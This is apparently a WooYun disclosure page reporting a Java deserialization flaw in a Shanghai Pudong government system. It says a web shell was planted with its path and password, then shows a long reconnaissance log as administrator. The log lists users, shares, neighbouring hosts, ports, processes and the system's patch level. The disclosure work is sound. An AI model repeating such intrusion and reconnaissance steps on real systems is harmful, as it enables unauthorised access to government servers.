乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-25: 细节已通知厂商并且等待厂商处理中 2015-12-29: 厂商已经确认,细节仅向厂商公开 2016-01-08: 细节向核心白帽子及相关领域专家公开 2016-01-18: 细节向普通白帽子公开 2016-01-28: 细节向实习白帽子公开 2016-02-09: 细节向公众公开
浦东新区位于上海市东部,雄踞东海之滨、杭州湾畔,内连扬子江、外眺太平洋,年平均气温16.2℃,四季分明、气候宜人。浦东新区占地约1210多平方公里,常住人口约412万。
系统**.**.**.**:8080/jybz/login.action地址**.**.**.**:8080/存在“Java 反序列化”漏洞
直接上传木马到服务器中
**.**.**.**:8080/kubasmyo/test.jsp密码tom
[*] 磁盘列表 [ C:D: ]C:\jboss-4.2.1.GA\server\default\.\deploy\yuhkdgfc.war\yuhkdgfc\> net user\\SERVER 的用户帐户-------------------------------------------------------------------------------Administrator Guest 命令成功完成。系统找不到指定的路径。C:\jboss-4.2.1.GA\bin\> net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 E$ E:\ 默认共享 IPC$ 远程 IPC ADMIN$ C:\Windows 远程管理 命令成功完成。C:\jboss-4.2.1.GA\bin\> net view服务器名称 注解-------------------------------------------------------------------------------\\D6VJ1H62 \\DB-D4BAB41920B5 \\DELLR730A \\HP \\OASERVER \\PDRB-GS1 \\PDRB-INTERNET3 \\PDSCJHLWSJJHYY \\PDSCJWWMHSJK \\PDZXAPP \\PDZXDB \\SERVER \\SERVER-A \\SVCTAG-1Y1GW2X \\WEB-2384B5181E8 \\WIN-C1DB87UL364 \\WIN-OVP23M1Q8R8 \\WIN-QDJ3YHL8WB0 \\WINDOWS-1SLKBH1 命令成功完成。C:\jboss-4.2.1.GA\bin\> net start已经启动以下 Windows 服务: Application Experience Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Group Policy Client HP AMS Storage Service HP ProLiant Agentless Management Service HP ProLiant Health Monitor Service HP ProLiant System Shutdown Service Human Interface Device Access IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent MySQL Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler Protected Storage Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) Remote Registry RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection SNMP Service Software Protection System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper User Profile Service Windows Event Log Windows Firewall Windows Font Cache Service Windows Management Instrumentation Windows Modules Installer Windows Remote Management (WS-Management) Windows Time Windows Update Workstation 主动防御命令成功完成。C:\jboss-4.2.1.GA\bin\> netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 424 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1098 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:1099 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:3306 **.**.**.**:0 LISTENING 3348 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 2964 TCP **.**.**.**:4444 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:4445 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:4446 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:8083 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:8093 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:47001 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 788 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 464 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 672 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 892 TCP **.**.**.**:49158 **.**.**.**:0 LISTENING 884 TCP **.**.**.**:51991 **.**.**.**:0 LISTENING 4660 TCP **.**.**.**:60874 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:60875 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:60877 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1098 **.**.**.**:63670 ESTABLISHED 4536 TCP **.**.**.**:3873 **.**.**.**:0 LISTENING 4536 TCP **.**.**.**:8080 **.**.**.**:33867 FIN_WAIT_2 4536 TCP **.**.**.**:8080 **.**.**.**:34201 FIN_WAIT_2 4536 TCP **.**.**.**:8080 **.**.**.**:34541 FIN_WAIT_2 4536 TCP **.**.**.**:8080 **.**.**.**:34564 FIN_WAIT_2 4536 TCP **.**.**.**:8080 **.**.**.**:34567 FIN_WAIT_2 4536 TCP **.**.**.**:8080 **.**.**.**:34608 FIN_WAIT_2 4536 TCP **.**.**.**:8080 **.**.**.**:34620 FIN_WAIT_2 4536 TCP **.**.**.**:8080 **.**.**.**:34621 FIN_WAIT_2 4536 TCP **.**.**.**:8080 **.**.**.**:35084 TIME_WAIT 0 TCP **.**.**.**:8080 **.**.**.**:35397 ESTABLISHED 4536 TCP **.**.**.**:8080 **.**.**.**:35500 ESTABLISHED 4536 TCP **.**.**.**:8080 **.**.**.**:35535 ESTABLISHED 4536 TCP **.**.**.**:8080 **.**.**.**:35536 ESTABLISHED 4536 TCP **.**.**.**:8080 **.**.**.**:35537 ESTABLISHED 4536 TCP **.**.**.**:8080 **.**.**.**:35563 ESTABLISHED 4536 TCP **.**.**.**:8080 **.**.**.**:35564 ESTABLISHED 4536 TCP **.**.**.**:62880 **.**.**.**:80 ESTABLISHED 1720 TCP **.**.**.**:63259 **.**.**.**:80 ESTABLISHED 1720 TCP **.**.**.**:63664 **.**.**.**:1098 TIME_WAIT 0 TCP **.**.**.**:63669 **.**.**.**:1098 TIME_WAIT 0 TCP **.**.**.**:63670 **.**.**.**:1098 ESTABLISHED 4536 TCP **.**.**.**:63671 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:3306 **.**.**.**:63580 ESTABLISHED 3348 TCP **.**.**.**:63580 **.**.**.**:3306 ESTABLISHED 4536 TCP [::]:135 [::]:0 LISTENING 424 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:1098 [::]:0 LISTENING 4536 TCP [::]:1099 [::]:0 LISTENING 4536 TCP [::]:3389 [::]:0 LISTENING 2964 TCP [::]:4444 [::]:0 LISTENING 4536 TCP [::]:4445 [::]:0 LISTENING 4536 TCP [::]:4446 [::]:0 LISTENING 4536 TCP [::]:8009 [::]:0 LISTENING 4536 TCP [::]:8080 [::]:0 LISTENING 4536 TCP [::]:8083 [::]:0 LISTENING 4536 TCP [::]:8093 [::]:0 LISTENING 4536 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 788 TCP [::]:49153 [::]:0 LISTENING 464 TCP [::]:49154 [::]:0 LISTENING 672 TCP [::]:49155 [::]:0 LISTENING 892 TCP [::]:49158 [::]:0 LISTENING 884 TCP [::]:51991 [::]:0 LISTENING 4660 TCP [::]:60874 [::]:0 LISTENING 4536 TCP [::]:60875 [::]:0 LISTENING 4536 TCP [::]:60877 [::]:0 LISTENING 4536 UDP **.**.**.**:123 *:* 736 UDP **.**.**.**:161 *:* 1532 UDP **.**.**.**:500 *:* 672 UDP **.**.**.**:3600 *:* 1720 UDP **.**.**.**:4500 *:* 672 UDP **.**.**.**:5355 *:* 1164 UDP **.**.**.**:50600 *:* 2620 UDP **.**.**.**:53878 *:* 2620 UDP **.**.**.**:53879 *:* 2620 UDP **.**.**.**:57833 *:* 2620 UDP **.**.**.**:57834 *:* 2620 UDP **.**.**.**:58002 *:* 2620 UDP **.**.**.**:63190 *:* 2620 UDP **.**.**.**:63191 *:* 2620 UDP **.**.**.**:63192 *:* 2620 UDP **.**.**.**:63197 *:* 2620 UDP **.**.**.**:63198 *:* 2620 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:54230 *:* 1720 UDP [::]:123 *:* 736 UDP [::]:161 *:* 1532 UDP [::]:500 *:* 672 UDP [::]:4500 *:* 672 UDP [::]:5355 *:* 1164C:\jboss-4.2.1.GA\bin\> tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 608 暂缺 csrss.exe 732 暂缺 wininit.exe 788 暂缺 csrss.exe 796 暂缺 winlogon.exe 836 暂缺 services.exe 884 暂缺 lsass.exe 892 ProtectedStorage, SamSs lsm.exe 904 暂缺 svchost.exe 1000 DcomLaunch, PlugPlay, Power svchost.exe 424 RpcEptMapper, RpcSs svchost.exe 464 Dhcp, eventlog, lmhosts svchost.exe 672 AeLookupSvc, CertPropSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, SessionEnv, ShellHWDetection, Winmgmt, wuauserv svchost.exe 736 EventSystem, netprofm, nsi, W32Time svchost.exe 1016 hidserv, Netman, TrkWks, UmRdpService, UxSm ZhuDongFangYu.exe 1060 ZhuDongFangYu svchost.exe 1164 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 1260 BFE, DPS, MpsSvc spoolsv.exe 1392 Spooler HpAmsStor.exe 1452 HpAmsStor ProLiantMonitor.exe 1488 ProLiantMonitor, sysdown svchost.exe 1512 RemoteRegistry snmp.exe 1532 SNMP hpqams.exe 1700 hpqams WmiPrvSE.exe 2016 暂缺 taskhost.exe 2600 暂缺 dwm.exe 2680 暂缺 explorer.exe 2736 暂缺 MtxHotPlugService.exe 2912 暂缺 360sd.exe 2992 暂缺 360Tray.exe 1720 暂缺 360rp.exe 2620 暂缺 SoftMgrLite.exe 3840 暂缺 GooglePinyinService.exe 3316 暂缺 WmiPrvSE.exe 4828 暂缺 svchost.exe 4928 FontCache msdtc.exe 5000 MSDTC mysqld.exe 3348 MySQL svchost.exe 4660 PolicyAgent svchost.exe 2964 TermService csrss.exe 4216 暂缺 winlogon.exe 1472 暂缺 LogonUI.exe 5344 暂缺 rdpclip.exe 3500 暂缺 mmc.exe 6728 暂缺 TrustedInstaller.exe 6132 TrustedInstaller sppsvc.exe 3784 sppsvc cmd.exe 6372 暂缺 conhost.exe 4448 暂缺 java.exe 4536 暂缺 cmd.exe 4908 暂缺 conhost.exe 6876 暂缺 tasklist.exe 5924 暂缺 C:\jboss-4.2.1.GA\bin\> ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : server 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接 8: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331i Adapter #8 物理地址. . . . . . . . . . . . . : 3C-A8-2A-1D-8E-E3 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接 7: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331i Adapter #7 物理地址. . . . . . . . . . . . . : 3C-A8-2A-1D-8E-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::878:858c:63e0:69%21(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DHCPv6 IAID . . . . . . . . . . . : 473737258 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1D-5B-4C-EA-3C-A8-2A-0E-E0-DD DNS 服务器 . . . . . . . . . . . : **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用以太网适配器 本地连接 6: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331i Adapter #6 物理地址. . . . . . . . . . . . . : 3C-A8-2A-1D-8E-E1 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接 5: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331i Adapter #5 物理地址. . . . . . . . . . . . . : 3C-A8-2A-1D-8E-E2 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{0386AFFB-B152-4FFD-97FD-372A8292D90C}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{429A72E8-BFBE-4EA5-8712-122600709630}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{FB1A5E50-AABF-45F1-B86C-3D8E62879B76}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{FF3B945B-C0AF-4CE5-BBBA-A92681F11825}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #4 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 Teredo Tunneling Pseudo-Interface: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2001:0:b4a8:29af:108f:2e16:f50d:f69a(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::108f:2e16:f50d:f69a%24(首选) 默认网关. . . . . . . . . . . . . : :: TCPIP 上的 NetBIOS . . . . . . . : 已禁用C:\jboss-4.2.1.GA\bin\> whoamiserver\administratorC:\jboss-4.2.1.GA\bin\> arp -a接口: **.**.**.** --- 0x15 Internet 地址 物理地址 类型 **.**.**.** 00-0f-e2-5a-76-d4 动态 **.**.**.** d4-ae-52-6f-6c-b2 动态 **.**.**.**24 00-15-5d-4a-7b-00 动态 **.**.**.** 00-25-b3-1e-96-f4 动态 **.**.**.**77 40-a8-f0-21-61-98 动态 **.**.**.**85 00-15-5d-a8-da-00 动态 **.**.**.**88 00-15-5d-7d-1d-00 动态 **.**.**.**96 44-a8-42-31-13-d7 动态 **.**.**.** ff-ff-ff-ff-ff-ff 静态 **.**.**.** 01-00-5e-00-00-16 静态 **.**.**.** 01-00-5e-00-00-fc 静态 **.**.**.** 01-00-5e-64-d8-73 静态 **.**.**.** 01-00-5e-2a-5a-6e 静态 **.**.**.** 01-00-5e-54-96-0e 静态 **.**.**.** 01-00-5e-09-2c-6a 静态 **.**.**.** 01-00-5e-15-e6-73 静态 **.**.**.** 01-00-5e-1b-49-7c 静态 **.**.**.** 01-00-5e-23-58-76 静态 **.**.**.** 01-00-5e-64-86-db 静态 **.**.**.** 01-00-5e-45-ee-74 静态 **.**.**.** 01-00-5e-22-e2-7c 静态 **.**.**.** 01-00-5e-20-3f-75 静态 **.**.**.** ff-ff-ff-ff-ff-ff 静态 C:\jboss-4.2.1.GA\bin\> systeminfo主机名: SERVEROS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: hp注册的组织: hp产品 ID: 00486-OEM-8400691-20006初始安装日期: 2015/8/11, 14:21:24系统启动时间: 2015/12/10, 12:38:51系统制造商: HP系统型号: ProLiant DL380 Gen9系统类型: x64-based PC处理器: 安装了 2 个处理器。 [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1196 Mhz [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1196 MhzBIOS 版本: HP P89, 2015/5/6Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: 暂缺时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 130,948 MB可用的物理内存: 122,613 MB虚拟内存: 最大值: 261,894 MB虚拟内存: 可用: 252,378 MB虚拟内存: 使用中: 9,516 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\SERVER修补程序: 安装了 1 个修补程序。 [01]: KB976902网卡: 安装了 4 个 NIC。 [01]: HP Ethernet 1Gb 4-port 331i Adapter 连接名: 本地连接 5 状态: 媒体连接已中断 [02]: HP Ethernet 1Gb 4-port 331i Adapter 连接名: 本地连接 6 状态: 媒体连接已中断 [03]: HP Ethernet 1Gb 4-port 331i Adapter 连接名: 本地连接 7 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::878:858c:63e0:69 [04]: HP Ethernet 1Gb 4-port 331i Adapter 连接名: 本地连接 8 状态: 媒体连接已中断C:\jboss-4.2.1.GA\bin\>
加强安全意识
危害等级:高
漏洞Rank:10
确认时间:2015-12-29 17:53
CNVD确认所述漏洞情况,已经转由CNCERT下发上海分中心,由其后续协调网站管理单位处置。
暂无
